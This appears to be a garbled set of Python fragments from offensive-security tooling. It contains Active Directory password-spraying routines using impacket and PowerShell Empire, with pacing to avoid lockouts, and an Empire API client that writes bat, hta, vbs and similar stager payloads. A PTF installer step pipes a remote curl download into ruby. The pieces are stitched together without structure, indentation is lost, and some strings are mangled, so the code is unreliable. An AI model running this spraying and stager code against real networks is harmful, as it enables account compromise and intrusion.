def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
## Against several random hosts on the domain. Un authentication per host.
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...")
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers = get_live_hosts(domain, computers, dc_ip)
print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
if nusers > len(computers):
users = users[:len(computers)]
for idx, user in enumerate(users):
smb_login(domain, user, spraypassword, computers[idx], sleep) if UseDomainAct else smb_login("", user, spraypassword, computers[idx], sleep)
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ):
## Against the DC
print_info("Querying for Domain Controllers...")
dcs =get_dcs(duser, dpass, domain, dc_ip)
dcs = get_live_hosts(domain,dcs,dc_ip)
dc = random.choice(dcs)
print_status("Randomly picked DC : "+dc[0]+" - "+dc[1])
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login(domain, users, spraypassword, dc, sleep)
else:
users = generate_random_users(nusers)
print_info("Using "+str(len(users))+" randomly generated usernames (mimic local account usage) ...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login("", users, spraypassword, dc, sleep)
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True):
## Against one random host on the domain
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers = get_live_hosts(domain,computers,dc_ip)
host = random.choice(computers)
print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
computername = host[0] if UseKerberos else host[1]
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
usernames = []
for user in users:
usernames.append(user if UseDomainAct else generate_random_users(10)[0])
usernames = ",".join(usernames)
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword,
'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'',
'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)}
results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
print_status("Obtained results from the Powershell Empire agent")
process_empire_results(results,host)
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True):
## Against several random hosts on the domain. One authentication per host.
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
#users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers=get_live_hosts(domain,computers,dc_ip)
print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each empire module execution...")
if nusers > len(computers):
users = users[:len(computers)]
for idx, user in enumerate(users):
duser = user if UseDomainAct else generate_random_users(1)[0]
computername = computers[idx][0] if UseKerberos else computers[idx][1]
module_options = {'UserName': duser, 'ComputerName': computername, 'Password': spraypassowrd,
'Domain': domain,'Sleep':'0'} if UseDomainAct else {'UserName': duser,'Domain':'',
'ComputerName': computername, 'Password': spraypassowrd,'Sleep':'0'}
results = empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin",
agentid, module_options)
print_status("Obtained results from the Powershell Empire agent")
process_empire_results(results,computers[idx])
# In thise scenario, adding the sleep here instead of Invoke-SMBLogin
if sleep > 0 :
time.sleep(sleep)
def login(self, host, empire_username, empire_password):
payload = {'username': empire_username,'password': empire_password}
headers = {'Content-Type': 'application/json'}
try:
r = requests.post(self.base_url + '/api/admin/login', json=payload, headers=headers, verify=False)
if r.status_code == 200:
#token['token'] = r.json()['token']
#self.token = r.json()['token']
return r.json()['token']
else:
print_error ('Authentication to Empire RESTful API Failed')
return
# if debug: print_debug('Status Code: {} Response: {}'.format(r.status_code, r.text))
#sys.exit(1)
except ConnectionError:
print_error ('Connection Error. Check Empire RESTful API')
return
def generate_stagers(self, listener='http'):
path= os.getcwd()+'/stagers'
headers = {'Content-Type': 'application/json'}
launchers = ['windows/launcher_bat','windows/launcher_sct','windows/hta','windows/launcher_xml','windows/launcher_vbs']
for launcher in launchers:
filename = ("/"+launcher[7:]).replace('_','.') if "hta" not in launcher else "/"+launcher.replace("windows","launcher").replace("/",".")
stager_options = {'StagerName': launcher,'Listener': listener}
r = requests.post(self.base_url + '/api/stagers', params=self.token, headers=headers,
json=stager_options, verify=False)
newfile = (r.json()[launcher]['Output'])
try:
output_file = open(path + filename, 'w')
if "hta" not in launcher:
newfile = base64.b64decode(newfile)
output_file = open(path + filename, 'wb')
output_file.write(newfile)
output_file.close()
except:
print_error("Could not create stagers. Check permissions")
print(traceback.format_exc())
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
## Against one random host on the domain
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers=get_live_hosts(domain,computers,dc_ip)
host = random.choice(computers)
print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login(domain, users, spraypassword, host, sleep)
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login("", users, spraypassword, host, sleep)
def check_dependency():
print_status("Checking for OSX package manager...")
if not os.path.isfile("/usr/local/bin/brew"):
print_warning("Brew not found...")
# Begin automated brew install
# Check for requirements
print_status("Checking for Xcode Command Line Tools...")
if subprocess.Popen("xcode-select -p", shell=True).wait() != 0:
print_warning("Xcode Command Line Tools not found...")
print_status("Attempting install of Xcode Command Line Tools...")
# Try to install Xcode tools
try:
if subprocess.Popen("xcode-select --install", shell=True).wait() == 0:
print_status("Xcode CLI Tools installed successfully.")
except:
print_error("Xcode Command Line Tool install failed. Try to install manually and rerun PTF...")
sys.exit()
# Pre-req test passed, begin brew installation
try:
print_status("Beginning brew installation..")
subprocess.Popen(
'ruby -e "$(curl -fsSL "https://raw.githubusercontent.com/Homebrew/install/master/install)"', shell=True
).wait()
except:
print_error("Something in the brew installtion failed. Try to install manually and rerun PTF...")
sys.exit()
# install caskroom
try:
print_status("Beginning brew caskroom installtion and configuration")
subprocess.Popen("brew tap caskroom/cask", shell=True).wait()
subprocess.Popen("brew install caskroom/cask/brew-cask", shell=True).wait()
except:
print_error(
"Something in the brew caskroom installtion failed. Try to run 'brew install caskroom/cask/brew-cask' manually and rerun PTF..."
)
sys.exit()
An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected.
ERROR
Due to a more serious problem, the software has not been able to perform some function.
CRITICAL
A serious error, indicating that the program itself may be unable to continue running.
'''
try:
# Setting logging output configuration TESTING ONLY!!!
''' *************************************************** '''
# First check if the file exists, if it does emtpy the file with /dev/null
if os.path.isfile("ptf-output.log"):
os.system("cat /dev/null > ptf-output.log")
log = logging.basicConfig(filename="ptf-output.log", level=logging.INFO)
#log = logging.getLogger("PTF Basic Logger")
log = logging.info
info = logging.info
debug = logging.debug
error = logging.error
critical = logging.critical
''' *************************************************** '''
except Exception as error:
print_error(
"Ooops! There seems to be a mistake somewhere in src.ptflogger module")
print_error(error)
sys.exit()